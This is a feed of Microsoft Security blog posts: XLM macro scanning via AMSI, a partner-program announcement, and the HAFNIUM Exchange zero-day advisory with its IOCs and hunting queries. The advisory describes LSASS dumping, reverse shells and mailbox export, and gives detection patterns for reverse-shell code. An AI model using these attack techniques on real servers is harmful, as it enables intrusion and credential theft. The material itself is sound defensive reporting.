| where SourceIp in (IPList) or DestinationIp in (IPList) or RemoteDnsCanonicalNames has_any (DomainNames)
| parse RemoteDnsCanonicalNames with * '["' DNSName '"]' *
| extend IPMatch = case( SourceIp in (IPList), "SourceIP", DestinationIp in (IPList), "DestinationIP", "None")
| extend timestamp = TimeGenerated, IPCustomEntity = case(IPMatch == "SourceIP", SourceIp, IPMatch == "DestinationIP", DestinationIp, "NoMatch"), HostCustomEntity = Computer
| where ClientIP in (IPList)
| extend timestamp = TimeGenerated, IPCustomEntity = ClientIP, AccountCustomEntity = UserId
| where RemoteUrl has_any (DomainNames) or RemoteIP in (IPList)
| extend timestamp = TimeGenerated, DNSName = RemoteUrl, IPCustomEntity = RemoteIP, HostCustomEntity = DeviceName
| where ResourceType == "AZUREFIREWALLS"
| where Category == "AzureFirewallDnsProxy"
| parse msg_s with "DNS Request: " ClientIP ":" ClientPort " - " QueryID " " Request_Type " " Request_Class " " Request_Name ". " Request_Protocol " " Request_Size " " EDNSO_DO " " EDNS0_Buffersize " " Responce_Code " " Responce_Flags " " Responce_Size " " Response_Duration
| where Request_Name has_any (DomainNames)
| extend timestamp = TimeGenerated, DNSName = Request_Name, IPCustomEntity = ClientIP
| where ResourceType == "AZUREFIREWALLS"
| where Category == "AzureFirewallApplicationRule"
| parse msg_s with Protocol 'request from ' SourceHost ':' SourcePort 'to ' DestinationHost ':' DestinationPort '. Action:' Action
| where isnotempty(DestinationHost)
| where DestinationHost has_any (DomainNames)
| extend timestamp = TimeGenerated, DNSName = DestinationHost, IPCustomEntity = SourceHost

The post GoldMax, GoldFinder, and Sibot: Analyzing NOBELIUM’s layered persistence appeared first on Microsoft Security.

XLM + AMSI: New runtime defense against Excel 4.0 macro malware

Microsoft Malware Protection Center - Wed, 03/03/2021 - 12:00pm

We have recently expanded the integration of Antimalware Scan Interface (AMSI) with Office 365 to include the runtime scanning of Excel 4.0 (XLM) macros, to help antivirus solutions tackle the increase in attacks that use malicious XLM macros. This integration, an example of the many security features released for Microsoft 365 Apps on a regular basis, reflects our commitment to continuously increase protection for Microsoft 365 customers against the latest threats.

Microsoft Defender Antivirus is using this integration to detect and block XLM-based malware, and we encourage other antivirus products to use this open interface to gain better visibility and improve protections against these threats.

XLM macros is a legacy macro language that was made available to Microsoft Excel in 1992, prior to the introduction of Visual Basic for Applications (VBA) in 1993. While more rudimentary than VBA, XLM is powerful enough to provide interoperability with the operating system, and many organizations and users continue to use its functionality for legitimate purposes. Cybercriminals know this, and they have been abusing XLM macros, increasingly more frequently, to call Win32 APIs and run shell commands.

The AMSI instrumentation for VBA has been providing deep visibility into the runtime behavior of VBA macros. Its release in 2018 effectively removed the armor that macro-obfuscation equipped malware with, exposing malicious code to improved levels of scrutiny. Naturally, threat actors like those behind Trickbot, Zloader, and Ursnif have looked elsewhere for features to abuse and operate under the radar of security solutions, and they found a suitable alternative in XLM.

Like VBA and many other scripting languages abused by malware, XLM code can be obfuscated relatively easily to conceal the real intent of the macro. For example, attackers can hide URLs or file names of executable files from static inspection through simple strings manipulations. Attackers also take advantage of the way macro code persists within the Excel document—while VBA macros are stored in a dedicated OLE stream (and hence can be easily located and extracted), XLM macros do not exist as a separate, well-defined entity. Rather, each XLM macro statement is a formula within a cell. Extracting a whole XLM macro can become a cumbersome task, requiring a cell-by-cell inspection of the whole document.

Figure 1. Sample malicious XLM macro

In addition, while formulas are typically executed downwards starting from the top, with XLM the macro content can be quite spread out, thanks to control flow statements like RUN, CALL, or GOTO, which allow the switching of execution flow from one column to another. This feature, together with obfuscation, has been abused by attackers to craft documents that could evade static analysis.

AMSI instrumentation for Excel 4.0 (XLM) macros

AMSI is an open interface that allows any application to request the scanning of any data at any time. In a nutshell, this technology provides applications the capability to interface with the installed antivirus solution in order to inspect and scan potentially dangerous data (e.g., a file downloaded from a remote location, or data generated dynamically by an application). Microsoft already utilizes this technology in various applications to detect malicious macros, script-based malware, and other threats:

  • Office VBA macros
  • JScript
  • VBScript
  • PowerShell
  • WMI
  • Dynamically loaded .NET assemblies
  • MSHTA/Jscript9

The data provided by AMSI is leveraged extensively by Microsoft Defender for Endpoint. It provides important data for machine learning models that process billions of signals every day to identify and block malicious behaviors. The XLM instrumentation is similar to the implementation in VBA and other scripting engines that integrate with AMSI:

Figure 2. AMSI instrumentation for XLM

The XLM language allows a user to write programs that call native runtime functions, as well as external Win32 APIs. In both cases, the interfaces that dispatch the calls to these functions are intercepted and directed to an internal logger. The logger component stores the intercepted functions in text format within a circular buffer. When certain dangerous functions are called, for example the runtime function EXEC or the Win32 API ShellExecute, XLM halts the macro execution and invokes AMSI to request a synchronous scan of the circular buffer containing the functions logged up to that point. Such dangerous functions are called “trigger functions”. If the antivirus identifies the macro as malware, the execution of the macro is aborted and Excel is safely terminated, blocking the attack and preventing the malicious macro from doing any damage. Otherwise, the user experience continues seamlessly.

It’s important to observe that the interception of XLM function calls happens at runtime. This means that the logger component always registers the true behavior of all functions and associated parameters, which may contain URLs, file names, and other important IOCs, regardless of the obfuscation used by the malware.

The following is an example of an XLM macro found in a malicious document:

Figure 3. Sample XLM macro

This malicious macro consists of a series of commands (e.g., RUN, REGISTER, IF, etc.) with related parameters specified by references to other cells. For example, the token $CA$1889 passed to the first function RUN indicates that the string provided as parameter for this function is in the cell at column CA and row 1889.

This is only one of the many ways that XLM-based malware can obfuscate code. Detecting this macro is challenging because it doesn’t expose any suspicious strings or behavior. This is where the power of AMSI comes into play: the instrumentation allows XLM to inspect functions when they are invoked, so that all their parameters have already been de-obfuscated. As a result, the above macro produces a log that looks like the following:

Figure 4. Sample log

The XLM engine determines that the dangerous function ShellExecuteA is being invoked, and subsequently places the macro execution on hold and passes the macro behavioral log to AMSI for scanning. The antivirus now has visibility into a behavioral log that completely exposes all of the data including, API names, URLs, and file names. The log makes it easy to conclude that this macro is trying to download and execute a DLL payload via the tool Rundll32.

Case study: ZLoader campaign

ZLoader is a malware family that has been actively perpetrating financial theft for several years. Like many of its peers, ZLoader operates via aggressive campaigns that rely on social engineering and the abuse of Office documents spread via email.

We have been monitoring the activity of this threat and observed that in the last year the attackers shifted to XLM as their infection vector of choice. The Excel documents have a typical lure message to trick the user into clicking “Enable Content” to allow the macro code to run.

Figure 5. Malicious Excel file used in Zloader campaign

A closer look at the document reveals an Excel sheet with an obscure-looking name. That sheet embeds XLM macro formulas, which are stored several rows down to make the sheet look empty. Furthermore, the macro formulas are spread out and obfuscated, hindering static analysis and raising more challenges for identifying intent.

Figure 6. Malicious XLM macro used in ZLoader campaign

Executing and debugging the macro with Excel is not very straightforward either. The macro has long loops that are used to decode and run further obfuscated macro formulas, and the Excel’s debugger doesn’t have the ability to control the execution in a granular way in order to skip loops and break on specific formulas.

However, when this macro runs with the AMSI instrumentation enabled, it produces up to three different logs that are passed to AMSI. The first two look like the following:

Figure 7. Log produced when ZLoader’s XLM macro is run

The image only shows the final part of the log where the interesting activity shows up. We can see that the macro is issuing a new EXEC statement to run a .vbs file via explorer.exe. This EXEC statement causes the execution of the VBScript named EW2H.vbs, which has been decoded and saved to disk by the macro prior to the EXEC line. The VBScript then tries to download and run a binary payload. The macro attempts to do this twice, hence this log (with minor variations) is passed to AMSI twice.

If the above steps fail, the macro resorts to downloading the payload directly, producing the following log for AMSI:

Figure 8. Log produced when ZLoader’s XLM macro is run

The macro defines two URLs, then downloads their content with the API URLDownloadToFileA, and finally invokes the API ShellExecuteA to launch the downloaded payload (the file jxi09.txt) via rundll32.exe. We can infer from this line that the payload is a DLL.

All three logs offer plenty of opportunities to detect malicious behavior and also allow the easy extraction of relevant IOCs like URLs, file names, etc. The initial XLM code in the Excel document is completely obfuscated and contains no usable information, making it tricky to issue static detections that are both effective and durable. With the dynamic nature of AMSI, the runtime behavior can be observed in cleartext, even with obfuscation. Detections based on the logs passed to AMSI also have the advantage of being more robust and generic in nature.


Runtime inspection of XLM macros is now available in Microsoft Excel and can be used by antivirus solutions like Microsoft Defender Antivirus that are registered as an AMSI provider on the device. This feature is included as an addition to the existing AMSI integration with Office. It’s enabled by default on the February Current Channel and Monthly Enterprise Channel for Microsoft 365 subscription users.

In its default configuration, XLM macros are scanned at runtime via AMSI, except in the following scenarios:

Administrators can now use the existing Microsoft 365 applications policy control to configure when both XLM and VBA macros are scanned at runtime via AMSI. Get the latest group policy template files.


Group Policy setting name Macro Runtime Scan Scope Path User Configuration > Administrative templates > Microsoft Office 2016 > Security Settings This policy setting specifies the behavior for both the VBA and Excel 4.0 (XLM) runtime scan features. Multiple Office apps support VBA macros, but XLM macros are only supported by Excel. Macros can only be scanned if the antivirus software registers as an Antimalware Scan Interface (AMSI) provider on the device.

If you enable this policy setting, you can choose from the following options to determine the macro runtime scanning behavior:

Disable for all files (not recommended): If you choose this option, no runtime scanning of enabled macros will be performed.

Enable for low trust files: If you choose this option, runtime scanning will be enabled for all files for which macros are enabled, except for the following files:

  • Files opened while macro security settings are set to “Enable all macros”
  • Files opened from a trusted location
  • Files that are Trusted Documents
  • Files that contain VBA that is digitally signed by a trusted publisher

Enable for all files: If you choose this option, then low trust files are not excluded from runtime scanning. The VBA and XLM runtimes report to an antivirus system certain high-risk code behaviors the macro is about to execute. This allows the antivirus system to indicate whether or not the macro behavior is malicious. If the behavior is determined to be malicious, the Office application closes the session and the antivirus system can quarantine the file. If the behavior is non-malicious, the macro execution proceeds.

Note: When macro runtime scanning is enabled, the runtime performance of affected VBA projects and XLM sheets may be reduced.

If you disable this policy setting, no runtime scanning of enabled macros will be performed.

If you don’t configure this policy setting, “Enable for low trust files” will be the default setting.

Note: This policy setting only applies to subscription versions of Office, such as Microsoft 365 Apps for enterprise. AMSI improves security for all

AMSI provides deep and dynamic visibility into the runtime behaviors of macros and other scripts to expose threats that hide malicious intent behind obfuscation, junk control flow statements, and many other tricks. Microsoft Defender Antivirus, the built-in antivirus solution on Windows 10, has been leveraging AMSI to uncover a wide range of threats, from common malware to sophisticated attacks. The recent AMSI instrumentation in XLM directly tackles the rise of malware campaigns that abuse this feature. Because AMSI is an open interface, other antivirus solutions can leverage the same visibility to improve protections against threats. Security vendors can learn how to leverage AMSI in their antivirus products here.

At Microsoft, we take full advantage of signals from AMSI. The data generated by AMSI is not only useful for immediate client antimalware detections, but also provides rich signals for Microsoft Defender for Endpoint. In our blog post about AMSI for VBA, we described how these signals are ingested by multiple layers of cloud-based machine learning classifiers and are combined with all other signals. The result is an enhanced protection layer that learns to recognize and block new and unknown threats in real-time.

Figure 9. Example of detection from Microsoft Defender Antivirus based on data inspected by AMSI

Figure 10: Notification from Microsoft Excel after AMSI reported malware detection

Figure 11: Example of Microsoft Defender for Endpoint alert for detection of XLM malware

The visibility provided by AMSI leads to significant improvements in generic and resilient signatures that can stop waves of obfuscated and mutated variants of threats. AMSI-driven protection adds to an extensive multi-layer protection stack in Microsoft Defender for Endpoint, which also includes attack surface reduction, network protection, behavior monitoring and other technologies that protect against macro malware and other similar script-based threats.

The AMSI-enriched visibility provided by Microsoft Defender for Endpoint is further amplified across Microsoft 365 Defender, such that XLM macro threats are detected and blocked on various entry vectors. The orchestration of signal-sharing and coordinated defense in Microsoft 365 ensures that, for example, Microsoft Defender for Office 365 blocks macro malware distributed via email, which is the most common delivery methods for these threats.

Learn how you can stop attacks through automated, cross-domain security and built-in AI with Microsoft Defender 365.


Giulia Biagini, Office 365 Threat Research Team

Auston Wallace, Microsoft 365 Security Team

Andrea Lelli, Microsoft 365 Defender Research Team

The post XLM + AMSI: New runtime defense against Excel 4.0 macro malware appeared first on Microsoft Security.

Compliance joins Microsoft Intelligent Security Association (MISA)

Microsoft Malware Protection Center - Wed, 03/03/2021 - 9:00am

Like many of you, I’m thrilled to have my 2020 calendar safely in the recycling pile. During that time though, you too might have noticed how, perhaps unknowingly, you were able to turn some of last year’s lemons into lemonade. Maybe you developed a deeper appreciation for everyday moments and the people in your life, gaining a new perspective on what matters most.

For my team, seeing the Microsoft Intelligent Security Association (MISA) grow to 190 partner companies has been a bright spot in a dark year. To date, MISA members have created 215 product integrations, and I’m pleased to announce that our pilot program for adding managed security service providers (MSSPs) has formally transitioned. MISA now includes 39 MSSP members who have created 76 MSSP offers since the beginning of the fiscal year.

“Microsoft Security integrates with a broad ecosystem of platforms and cloud providers, so they work with the things you already have in your environment; whether those things are from Microsoft, or not. Our partners are key to helping facilitate this integration.”Vasu Jakkal, CVP, Security, Compliance and Identity

“Adding managed security service providers promises to increase the ecosystem’s value even more by offering an extra layer of threat protection—reducing the day-to-day involvement of in-house security teams. It’s another important step in strengthening and simplifying security at a time when risk mitigation is one of IT’s highest priorities.”Shawn O’Grady, Senior Vice President and General Manager, Cloud + Data Center Transformation at Insight

Because Microsoft’s footprint extends across many technologies, we have an advantage in creating holistic solutions that encompass the full breadth of security, compliance, and identity. In keeping with that end-to-end approach, we’ve expanded MISA to include 5 new compliance products, growing the MISA product portfolio to 18.

“The explosion of data from digital transformation and remote work make the integration of security and compliance tools across internal and external ecosystems more critical than ever. Together with the deep expertise of our MISA members, we can help our customers address their complex, evolving security and compliance needs.”Alym Rayani, General Manager, Microsoft Compliance

Compliance comes to MISA

Microsoft compliance products help our customers assess their compliance risk, protect their sensitive data, and govern it according to regulatory requirements. Through MISA, members get support in building managed services and integrations that:

  1. Protect and govern data wherever it lives.
  2. Identify and take actions on critical insider risks.
  3. Simplify compliance and reducing risk.
  4. Investigate and respond with relevant data.

“TeleMessage is excited to bring our Mobile Communication Archiving products to be a part of Microsoft’s security solutions. Being a MISA member allows us to work closely with the Microsoft teams and allows us to provide seamless, secure, and compliant integrations delivering all popular forms of mobile communication.”—Guy Levit, CEO at TeleMessage

Microsoft Information Protection has been part of MISA since the association began in 2018, providing broad coverage across devices, apps, cloud services, and on-premises systems. This year, we’re continuing to develop our holistic partner community across security, compliance, and identity by adding five additional Microsoft compliance products to our portfolio:

  • Microsoft Information Governance: Keep what you need and delete what you don’t. Apply compliance solutions and a deletion workflow for email, documents, instant messages, social media, document collaboration platforms, and more.
  • Microsoft Data Loss Prevention: Help users stay compliant without interrupting their workflow—prevent the accidental sharing of sensitive information across Exchange Online, SharePoint Online, OneDrive for Business, Microsoft Teams, and desktop versions of Excel, PowerPoint, and Microsoft Word.
  • Microsoft 365 Insider Risk Management: Identify critical insider risks and take the appropriate action. With built-in privacy controls, use native and third-party signals to identify, investigate, and remediate malicious and inadvertent activities in your organization.
  • Microsoft Advanced eDiscovery: Gain an end-to-end workflow to collect, analyze, preserve, and export content that’s responsive to your organization’s internal and external investigations. Identify persons of interest and their data sources, then manage the legal-hold communication process.
  • Microsoft Compliance Manager: Get help throughout your compliance journey, from taking inventory of your data protection risks to managing the complexities of implementing controls, staying current with regulations and certifications, and reporting to auditors.

“Joining MISA enhances our relationship with Microsoft and our commitment to being an information governance and compliance leader providing solutions for organizations to bring third-party data into Microsoft 365 archive,” said Charles Weeden, Managing Partner of 17a-4, LCC. “DataParser’s connectors will allow Microsoft 365 Compliance users to ingest content from various sources, such as Bloomberg, Slack, Symphony, Webex Teams and many others.”

Connectors and APIs to extend compliance capabilities

Organizations today face an intimidating amount of data to protect across disparate systems, both on-premises and in the cloud. That’s why Microsoft compliance solutions span information protection and governance, data-loss prevention, insider risk, eDiscovery, audit, and compliance management—including your non-Microsoft data.

Microsoft 365 compliance enables organizations to extend, integrate, accelerate, and support their compliance solutions with three key building blocks:

All of these new capabilities exist within Microsoft’s integrated compliance platform. Meaning, customers only need to set compliance policies a single time, regardless of the data source.

“The Veritas Merge1 connector platform integration with M365 allows our joint customers to configure, connect, and capture a vast number of data sources from within the M365 compliance center. The integration makes it easy to quickly identify which data sources need to be captured, to configure connectivity to those data sources and to pull data into M365 all from within the Azure infrastructure. Our development teams have worked closely together for over 12 months to make sure the workflow is simple and the capabilities are robust. With the increase in global regulations over the past several years, our goal is to simplify compliance, and we believe we have achieved that by working together with Microsoft.”David Scott, Sr. Director, Digital Compliance at Veritas Technologies

Microsoft Security lights the way

As the global pandemic forced millions into remote work last year, hackers took advantage and upped their game, as seen with the recent Solorigate attack. Many organizations saw their sensitive data created, viewed, and distributed across multiple fragmented platforms that increased the potential attack surface. Because we view security as part of the common good, we chose to take a proactive approach; shifting cybersecurity away from the shadows and into a place of innovation and empowerment.

“MISA has helped us promote successful integrations with Azure Security Graph API and Azure Active Directory, both now deeply embedded in Barracuda security solutions.”Tim Jefferson, SVP Data, Networking, and Applications, Barracuda Networks

During Microsoft Ignite, March 2-4, 2021, you’ll see added investment in our security, compliance, and identity portfolio as we continue to innovate and create holistic solutions that support cultures of security for our customers and partners, based on four basic principles:

  • Protect everything: Safeguard your entire organization with integrated security, compliance, and identity solutions built to work across platforms and cloud environments.
  • Simplify the complex: Prioritize risks with unified management tools and strategic guidance created to maximize the human expertise inside your company.
  • Catch what others miss: Enable AI, automation, and human expertise to help you detect threats quickly, respond effectively, and fortify your security posture.
  • Grow your future: Gain the peace of mind that comes with a comprehensive security solution, empowering you to grow, create, and innovate across your business.

To learn more about upcoming big announcements at Microsoft Ignite this week, visit our latest blog posts:

To learn more about Microsoft Security solutions, visit our website.  Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Compliance joins Microsoft Intelligent Security Association (MISA) appeared first on Microsoft Security.

HAFNIUM targeting Exchange Servers with 0-day exploits

Microsoft Malware Protection Center - Tue, 03/02/2021 - 4:07pm

Microsoft has detected multiple 0-day exploits being used to attack on-premises versions of Microsoft Exchange Server in limited and targeted attacks. In the attacks observed, the threat actor used these vulnerabilities to access on-premises Exchange servers which enabled access to email accounts, and allowed installation of additional malware to facilitate long-term access to victim environments. Microsoft Threat Intelligence Center (MSTIC) attributes this campaign with high confidence to HAFNIUM, a group assessed to be state-sponsored and operating out of China, based on observed victimology, tactics and procedures.

The vulnerabilities recently being exploited were CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065, all of which were addressed in today’s Microsoft Security Response Center (MSRC) release – Multiple Security Updates Released for Exchange Server. We strongly urge customers to update on-premises systems immediately. Exchange Online is not affected.

We are sharing this information with our customers and the security community to emphasize the critical nature of these vulnerabilities and the importance of patching all affected systems immediately to protect against these exploits and prevent future abuse across the ecosystem. This blog also continues our mission to shine a light on malicious actors and elevate awareness of the sophisticated tactics and techniques used to target our customers. The related IOCs, Azure Sentinel advanced hunting queries, and Microsoft Defender for Endpoint product detections and queries shared in this blog will help SOCs proactively hunt for related activity in their environments and elevate any alerts for remediation.

Microsoft would like to thank our industry colleagues at Volexity and Dubex for reporting different parts of the attack chain and their collaboration in the investigation. Volexity has also published a blog post with their analysis. It is this level of proactive communication and intelligence sharing that allows the community to come together to get ahead of attacks before they spread and improve security for all.


HAFNIUM primarily targets entities in the United States across a number of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks, and NGOs.

HAFNIUM has previously compromised victims by exploiting vulnerabilities in internet-facing servers, and has used legitimate open-source frameworks, like Covenant, for command and control. Once they’ve gained access to a victim network, HAFNIUM typically exfiltrates data to file sharing sites like MEGA.

In campaigns unrelated to these vulnerabilities, Microsoft has observed HAFNIUM interacting with victim Office 365 tenants. While they are often unsuccessful in compromising customer accounts, this reconnaissance activity helps the adversary identify more details about their targets’ environments.

HAFNIUM operates primarily from leased virtual private servers (VPS) in the United States.

Technical details

Microsoft is providing the following details to help our customers understand the techniques used by HAFNIUM to exploit these vulnerabilities and enable more effective defense against any future attacks against unpatched systems.

CVE-2021-26855 is a server-side request forgery (SSRF) vulnerability in Exchange which allowed the attacker to send arbitrary HTTP requests and authenticate as the Exchange server.

CVE-2021-26857 is an insecure deserialization vulnerability in the Unified Messaging service. Insecure deserialization is where untrusted user-controllable data is deserialized by a program. Exploiting this vulnerability gave HAFNIUM the ability to run code as SYSTEM on the Exchange server. This requires administrator permission or another vulnerability to exploit.

CVE-2021-26858 is a post-authentication arbitrary file write vulnerability in Exchange. If HAFNIUM could authenticate with the Exchange server then they could use this vulnerability to write a file to any path on the server. They could authenticate by exploiting the CVE-2021-26855 SSRF vulnerability or by compromising a legitimate admin’s credentials.

CVE-2021-27065 is a post-authentication arbitrary file write vulnerability in Exchange. If HAFNIUM could authenticate with the Exchange server then they could use this vulnerability to write a file to any path on the server. They could authenticate by exploiting the CVE-2021-26855 SSRF vulnerability or by compromising a legitimate admin’s credentials.

Attack details

After exploiting these vulnerabilities to gain initial access, HAFNIUM operators deployed web shells on the compromised server. Web shells potentially allow attackers to steal data and perform additional malicious actions that lead to further compromise. One example of a web shell deployed by HAFNIUM, written in ASP, is below:

Following web shell deployment, HAFNIUM operators performed the following post-exploitation activity:

  • Using Procdump to dump the LSASS process memory:

  • Using 7-Zip to compress stolen data into ZIP files for exfiltration:

  • Adding and using Exchange PowerShell snap-ins to export mailbox data:

  • Using the Nishang Invoke-PowerShellTcpOneLine reverse shell:

  • Downloading PowerCat from GitHub, then using it to open a connection to a remote server:

HAFNIUM operators were also able to download the Exchange offline address book from compromised systems, which contains information about an organization and its users.

Our blog, Defending Exchange servers under attack, offers advice for improving defenses against Exchange server compromise. Customers can also find additional guidance about web shell attacks in our blog Web shell attacks continue to rise.

Can I determine if I have been compromised by this activity?

The below sections provide indicators of compromise (IOCs), detection guidance, and advanced hunting queries to help customers investigate this activity using Exchange server logs, Azure Sentinel, Microsoft Defender for Endpoint, and Microsoft 365 Defender. We encourage our customers to conduct investigations and implement proactive detections to identify possible prior campaigns and prevent future campaigns that may target their systems.

Check patch levels of Exchange Server

The Microsoft Exchange Server team has published a blog post on these new Security Updates providing a script to get a quick inventory of the patch-level status of on-premises Exchange servers and answer some basic questions around installation of these patches.

Scan Exchange log files for indicators of compromise
  • CVE-2021-26855 exploitation can be detected via the following Exchange HttpProxy logs:
    • These logs are located in the following directory: %PROGRAMFILES%\Microsoft\Exchange Server\V15\Logging\HttpProxy
    • Exploitation can be identified by searching for log entries where the AuthenticatedUser is empty and the AnchorMailbox contains the pattern of ServerInfo~*/*
      • Here is an example PowerShell command to find these log entries:

Import-Csv -Path (Get-ChildItem -Recurse -Path “$env:PROGRAMFILES\Microsoft\Exchange Server\V15\Logging\HttpProxy” -Filter ‘*.log’).FullName | Where-Object {  $_.AuthenticatedUser -eq ” -and $_.AnchorMailbox -like ‘ServerInfo~*/*’ } | select DateTime, AnchorMailbox

    • If activity is detected, the logs specific to the application specified in the AnchorMailbox path can be used to help determine what actions were taken.
      • These logs are located in the %PROGRAMFILES%\Microsoft\Exchange Server\V15\Logging directory.
  • CVE-2021-26858 exploitation can be detected via the Exchange log files:
    • C:\Program Files\Microsoft\Exchange Server\V15\Logging\OABGeneratorLog
    • Files should only be downloaded to the %PROGRAMFILES%\Microsoft\Exchange Server\V15\ClientAccess\OAB\Temp directory
      • In case of exploitation, files are downloaded to other directories (UNC or local paths)
    • Windows command to search for potential exploitation:

findstr /snip /c:”Download failed and temporary file” “%PROGRAMFILES%\Microsoft\Exchange Server\V15\Logging\OABGeneratorLog\*.log”

  • CVE-2021-26857 exploitation can be detected via the Windows Application event logs
    • Exploitation of this deserialization bug will create Application events with the following properties:
      • Source: MSExchange Unified Messaging
      • EntryType: Error
      • Event Message Contains: System.InvalidCastException
    • Following is PowerShell command to query the Application Event Log for these log entries:

Get-EventLog -LogName Application -Source “MSExchange Unified Messaging” -EntryType Error | Where-Object { $_.Message -like “*System.InvalidCastException*” }

  • CVE-2021-27065 exploitation can be detected via the following Exchange log files:
    • C:\Program Files\Microsoft\Exchange Server\V15\Logging\ECP\Server

All Set-<AppName>VirtualDirectory properties should never contain script. InternalUrl and ExternalUrl should only be valid Uris.

    • Following is a PowerShell command to search for potential exploitation:

Select-String -Path “$env:PROGRAMFILES\Microsoft\Exchange Server\V15\Logging\ECP\Server\*.log” -Pattern ‘Set-.+VirtualDirectory’

Host IOCs Hashes

Web shell hashes

  • b75f163ca9b9240bf4b37ad92bc7556b40a17e27c2b8ed5c8991385fe07d17d0
  • 097549cf7d0f76f0d99edf8b2d91c60977fd6a96e4b8c3c94b0b1733dc026d3e
  • 2b6f1ebb2208e93ade4a6424555d6a8341fd6d9f60c25e44afe11008f5c1aad1
  • 65149e036fff06026d80ac9ad4d156332822dc93142cf1a122b1841ec8de34b5
  • 511df0e2df9bfa5521b588cc4bb5f8c5a321801b803394ebc493db1ef3c78fa1
  • 4edc7770464a14f54d17f36dc9d0fe854f68b346b27b35a6f5839adf1f13f8ea
  • 811157f9c7003ba8d17b45eb3cf09bef2cecd2701cedb675274949296a6a183d
  • 1631a90eb5395c4e19c7dbcbf611bbe6444ff312eb7937e286e4637cb9e72944

We observed web shells in the following paths:

  • C:\inetpub\wwwroot\aspnet_client\
  • C:\inetpub\wwwroot\aspnet_client\system_web\
  • In Microsoft Exchange Server installation paths such as:
    • %PROGRAMFILES%\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\
    • C:\Exchange\FrontEnd\HttpProxy\owa\auth\

The web shells we detected had the following file names:

  • web.aspx
  • help.aspx
  • document.aspx
  • errorEE.aspx
  • errorEEE.aspx
  • errorEW.aspx
  • errorFF.aspx
  • healthcheck.aspx
  • aspnet_www.aspx
  • aspnet_client.aspx
  • xx.aspx
  • shell.aspx
  • aspnet_iisstart.aspx
  • one.aspx

 Check for suspicious .zip, .rar, and .7z files in C:\ProgramData\, which may indicate possible data exfiltration.

Customers should monitor these paths for LSASS dumps:

  • C:\windows\temp\
  • C:\root\

Many of the following detections are for post-breach techniques used by HAFNIUM. So while these help detect some of the specific current attacks that Microsoft has observed it remains very important to apply the recently released updates for CVE-2021-26855, CVE-2021-26857, CVE-2021-27065 and CVE-2021-26858.

Microsoft Defender Antivirus detections

Please note that some of these detections are generic detections and not unique to this campaign or these exploits.

  • Exploit:Script/Exmann.A!dha
  • Behavior:Win32/Exmann.A
  • Backdoor:ASP/SecChecker.A
  • Backdoor:JS/Webshell (not unique)
  • Trojan:JS/Chopper!dha (not unique)
  • Behavior:Win32/DumpLsass.A!attk (not unique)
  • Backdoor:HTML/TwoFaceVar.B (not unique)
Microsoft Defender for Endpoint detections
  • Suspicious Exchange UM process creation
  • Suspicious Exchange UM file creation
  • Possible web shell installation (not unique)
  • Process memory dump (not unique)
Azure Sentinel detections Advanced hunting queries

To locate possible exploitation activity related to the contents of this blog, you can run the following advanced hunting queries via Microsoft Defender for Endpoint and Azure Sentinel:

Microsoft Defender for Endpoint advanced hunting queries

Microsoft 365 Defender customers can find related hunting queries below or at this GitHub location:

Additional queries and information are available via Threat Analytics portal for Microsoft Defender customers.

UMWorkerProcess.exe in Exchange creating abnormal content

Look for Microsoft Exchange Server’s Unified Messaging service creating non-standard content on disk, which could indicate web shells or other malicious content, suggesting exploitation of CVE-2021-26858 vulnerability:

DeviceFileEvents | where InitiatingProcessFileName == "UMWorkerProcess.exe" | where FileName != "CacheCleanup.bin" | where FileName !endswith ".txt" | where FileName !endswith ".LOG" | where FileName !endswith ".cfg" | where FileName != "cleanup.bin"

UMWorkerProcess.exe spawning

Look for Microsoft Exchange Server’s Unified Messaging service spawning abnormal subprocesses, suggesting exploitation of CVE-2021-26857 vulnerability:

DeviceProcessEvents | where InitiatingProcessFileName == "UMWorkerProcess.exe" | where FileName != "wermgr.exe" | where FileName != "WerFault.exe"

Please note excessive spawning of wermgr.exe and WerFault.exe could be an indicator of compromise due to the service crashing during deserialization.

Azure Sentinel advanced hunting queries

Azure Sentinel customers can find a Sentinel query containing these indicators in the Azure Sentinel Portal or at this GitHub location:

Look for Nishang Invoke-PowerShellTcpOneLine in Windows Event Logging:

SecurityEvent  | where EventID == 4688  | where Process has_any ("powershell.exe", "PowerShell_ISE.exe")  | where CommandLine has "$client = New-Object System.Net.Sockets.TCPClient"

Look for downloads of PowerCat in cmd and Powershell command line logging in Windows Event Logs:

SecurityEvent  | where EventID == 4688  | where Process has_any ("cmd.exe", "powershell.exe", "PowerShell_ISE.exe")  | where CommandLine has ""

Look for Exchange PowerShell Snapin being loaded. This can be used to export mailbox data, subsequent command lines should be inspected to verify usage:

SecurityEvent  | where EventID == 4688  | where Process has_any ("cmd.exe", "powershell.exe", "PowerShell_ISE.exe")  | where isnotempty(CommandLine)  | where CommandLine contains "Add-PSSnapin Microsoft.Exchange.Powershell.Snapin"  | summarize FirstSeen = min(TimeGenerated), LastSeen = max(TimeGenerated) by Computer, Account, CommandLine


The post HAFNIUM targeting Exchange Servers with 0-day exploits appeared first on Microsoft Security.

Identity at Microsoft Ignite: Strengthening Zero Trust defenses in the era of hybrid work

Microsoft Malware Protection Center - Tue, 03/02/2021 - 9:00am

We’re now a year into our new reality, and two trends stand out. First, people need even more flexibility as we work, learn, and collaborate in a world without perimeters. And second, bad actors are getting even more sophisticated. They’re adding new attack vectors and combining them in new creative ways, as we just saw with Solorigate.

In January, I shared our top five identity priorities for 2021 to help you strengthen security and accelerate your transition to the new hybrid work era. More than ever, organizations need to strengthen their defenses to give employees, partners, and customers the flexibility to work from anywhere using apps that live inside and outside the traditional corporate network perimeter. That’s why Zero Trust, a security strategy that combines maximum flexibility with maximum security, is so crucial.

For IT pros and security professionals, the implementation of Zero Trust should be simple and straightforward. For users, it should never get in the way, and it should fit into familiar workflows and habits. This week, on the virtual Microsoft Ignite stage, I’m announcing several Azure Active Directory (Azure AD) innovations that will help make life easier for you and your employees now—and help you stay prepared for whatever comes next.

Give your employees a secure and seamless user experience

